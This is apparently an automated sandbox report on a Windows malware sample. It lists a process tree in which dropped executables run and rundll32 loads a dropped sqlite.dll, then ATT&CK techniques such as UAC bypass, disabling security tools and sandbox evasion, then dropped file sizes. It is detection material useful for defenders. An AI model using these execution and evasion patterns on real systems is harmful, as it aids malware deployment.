C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 2402⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exeWed120b6f5c6d562.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2116 -ip 21161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3764 -ip 37641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1116 -ip 11161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3228 -ip 32281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 408 -ip 4081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2960 -ip 29601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5824 -ip 58241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5932 -ip 59321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5816 -ip 58161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6820 -ip 68201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2432 -ip 24321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5984 -ip 59841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6788 -ip 67881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6852 -ip 68521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 3036 -ip 30361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1596 -ip 15961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 6892 -ip 68921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 6608 -ip 66081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 2536 -ip 25361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2200 -ip 22001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 6176 -ip 61761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5984 -ip 59841⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 4203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 460629855e209cd5b16a907274503a56 gT42+laoRUGWqQMp0E2DMg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5952 -ip 59521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7384 -ip 73841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 708 -p 7496 -ip 74961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 1064 -ip 10641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8924 -ip 89241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5608 -ip 56081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 9128 -ip 91281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3404 -ip 34041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8036 -ip 80361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6420 -ip 64201⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 400 -ip 4001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2440 -ip 24401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 2312 -ip 23121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 9072 -ip 90721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8884 -s 4563⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8884 -s 4563⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 8884 -ip 88841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 8516 -ip 85161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 8516 -ip 85161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\WerFault.exe"C:\Windows\system32\WerFault.exe" -k -lc WATCHDOG WATCHDOG-20211108-0823.dmp1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 8540 -ip 85401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 2156 -ip 21561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 6460 -ip 64601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 70BB7CD0850E1E41029D67F6D2651FCF C2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
3Registry Run Keys / Startup Folder
2Scheduled Task
1Winlogon Helper DLL
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5Impair Defenses
1Install Root Certificate
1Modify Registry
10Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
228KB
-
Filesize
172KB
-
Filesize
36KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
64KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
32KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
292KB
-
Filesize
168KB
-
Filesize
80KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.3MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
136KB
-
Filesize
6.1MB
-
Filesize
136KB
-
Filesize
6.1MB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8.6MB
-
Filesize
4.1MB
-
Filesize
6.0MB
-
Filesize
32KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
688KB
-
Filesize
692KB
-
Filesize
4KB
-
Filesize
384KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB